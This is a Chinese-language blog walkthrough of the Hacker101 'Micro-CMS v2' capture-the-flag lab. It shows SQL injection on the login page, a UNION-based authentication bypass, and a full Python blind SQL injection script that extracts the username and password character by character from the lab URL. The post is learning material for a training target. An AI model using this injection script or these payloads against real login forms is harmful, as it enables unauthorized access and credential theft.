Hacker101-Micro-v2-cms

记录hacker101 ctf靶场学习

Micro v2 cms篇

进入容器

image.png

image.png

扫出login的登录页面

image.png

直接到达登录页面

'看看有没有sql注入

image.png

报错后把报错页面返回过来了,可以看到py的sql里的语句

image.png

admin表,估计就是管理员的账户表了

尝试看看能不能直接用万能密码进去

image.png

回显无效的密码,应该后面还有语句去判断password字段,所以没通过

这里可以使用union联合查询重命名来绕过

image.png

原理是查询字段1后,再重命名为password使其密码为1

此处为个人推测,如有不准可以再评论区补充互相学习

image.png

登录成功

image.png

Private Page页面找到第一个flag

image.png

在页面提示中说

恭喜你能登录了,你有真的用户名和密码?如果你没有你就可以这样做!

推测估计还有真实的用户名密码,直接上脚本去跑,附上脚本,脚本用的二分法来爆破的

import requests


def num() -> (int, int):    # 最大数以及最小数的区间
    return 33, 126


def find(least: int, maximun: int) -> int:  # 最大数与最小数的中间值
    return (least + maximun) // 2


def main():
    request = requests.session()    # 开启一个请求会话1
    url = "https://50abdbe31d4050c164297ff620a122ab.ctf.hacker101.com/login"    # 靶场url
    password = ""
    username = ""
    passwd_len = 0
    user_len = 0
    for i in range(16):     # 获取用户名字符长度
        payload = f"' or length(username)={str(i)}#"    # sql注入的sql语句, 比较用户名长度, 长度正确会回显特定字符
        data = {"username": payload, "password": ""}
        response = request.post(url, data=data)
        if "Invalid password" in response.text:     # 正确的长度会在页面回显的字符
            user_len += i
            break
    print(f"用户名长度是: {user_len}")

    for i in range(16):     # 获取密码字符长度
        payload = f"' or length(password)={str(i)}#"    # 同上
        data = {"username": payload, "password": ""}
        response = request.post(url, data=data)
        if "Invalid password" in response.text:     # 同上
            passwd_len += i
            break
    print(f"密码长度是: {passwd_len}")

    for i in range(1, user_len+1):      # 根据获取到的长度来做的循环次数
        least, maximun = num()      # 获取最小值和最大值
        while abs(maximun - least) > 1:     # 最大值和最小值的绝对值做循环条件
            mid = find(least, maximun)      # 最大值和最小值的中间值
            payload = f"' or ord(substr(username,{i}, 1)) >{mid}#"      # 截取用户名字符,一次截取一个,从第一个字符开始截取, 再转换成ascii码进行比较
            data = {"username": payload, "password": ""}
            response = request.post(url, data=data)
            if "Invalid password" in response.text:     # 比较成功会出现的字符串
                least = mid
            else:
                maximun = mid
        username += chr(maximun)
        print(username, end="\r")

    print(f"用户名是: {username}")

    for i in range(1, passwd_len+1):       # 同上
        least, maximun = num()
        while abs(maximun - least) > 1:
            mid = find(least, maximun)
            payload = f"' or ord(substr(password,{i}, 1)) >{mid}#"
            data = {"username": payload, "password": ""}
            response = request.post(url, data=data)
            if "Invalid password" in response.text:
                least = mid
            else:
                maximun = mid
        password += chr(maximun)
        print(password, end="\r")

    print(f"密码是: {password}")


if __name__ == '__main__':
    main()



跑出账号密码

image.png

拿去登录,得到flag

image.png

还剩一个flag,这个flag卡了我很久我,后面实在没搞懂在哪就去看了别人的题解

这个flag是需要在没有管理员cookie去编辑文档才可以拿到

image.png

删除cookie后再点save就可以得到flag了

image.png

ok,过关

image.png

上一篇
摸鱼派客户端支援主题定制
如果你还没下载摸鱼派的客户端,请移步这里下载:https://github.com/imlinhanchao/fishpi-desktop/releases/ 摸鱼派客户端今天新增了主题定制功能,你可以根据自己的喜好定义客户端的外观了。 这里有一个简单的例子: https://github.com/ ....
下一篇
R~PA....?
入行RPA了 有点说不出的迷茫 有没有知道行内情况的鱼友来讲讲
时间排序
男人的世界, 未免有点太艰苦了😢 新人报到 -zsbd 下班预告 字幕摘抄 - 为什么大多数年轻人不知道自己想要什么? R~PA....? Hacker101-Micro-v2-cms 摸鱼派客户端支援主题定制 HomeLab 改造升级 2022-09 进化保存问题 摸鱼周报 20220923 进化中怎么生产钛?
上一篇
微信高版本 xweb 内核跳过青年大学习(更新脚本)
微信高版本xweb内核跳过青年大学习 哥们一个小群众,狗学校让非团员党员也要学青年大学习[图片] 那就不能怪我做一些小动作了 微信在8.02x的版本中已经替换了内核,从X5内核替换程了XWEB内核 [图片] 很不巧,我的是8.023的版本,所以不能直接使用X5内核的vConsole来直接调试(修改) ....
下一篇
整点有用的 -- 爬虫爬取美剧
起因 本来只是想单纯的看一下美剧,二刷一下mr robot,然后找到它家的网站 [图片] 在我看到一半的不小心按到了f12(真的是不小心),它就弹出来一个窗口 [图片] 我知道得太多了,。。。呀哟,先不说我是不是故意的吧,我这个君子你也防? 我的叛逆心里一下就上来了,你不让我看是吧, 我非要整!我非 ....
当前作者
《关于我弄了一个获取热搜程序的这一件事》 vscode? 爬吧 鱼排 Go 终端客户端 整点没用的 -google 儿子 Nexus5x 刷机 整点有用的 -- 爬虫爬取美剧 Hacker101-Micro-v2-cms 微信高版本 xweb 内核跳过青年大学习(更新脚本) v 我 50 带你入羊群 ~ xss 漏洞注入原理 【加班小记】20220626 hackfest2016: Quaoar 靶场 wp
上一篇
你是人间星河,是我的满目柔情
你是人间星河,是我的满目柔情 我贪恋的人间烟花不偏不倚,恰好是你 要等时间嘉许,等春风得意,我正好遇见你,然后余生都是你 老来多健忘,唯不忘相思♪⸜(๑ ॑꒳ ॑๑)⸝♪✰ 我来人间贩卖蓝天,只为收集美好:smiling_face_with_hearts: 睡觉了的互删吧,这么爱自己的身体肯定没时间 ....
下一篇
回来混个脸熟
有段时间咩来摸鱼派摸鱼了,好多人都不认识,特来混个脸熟。 不要问我为什么没来摸鱼,问就是居家隔离
热门排序
摸鱼周报 20221014 换了份工作 处理数据架构之 SpringBatch(更新:主要流程图,详情见第四章节,详尽的很哦) PainterEngine 虚拟键盘 你是人间星河,是我的满目柔情 Hacker101-Micro-v2-cms 回来混个脸熟 摸鱼周报 20220909 很无奈,又加班了 Hello Fishpi. 我是一个刚学编程的小菜鸡,来到本站发的第一贴就收到了如此多的回帖真是令人受宠若惊。 鱼友们,大家好!!!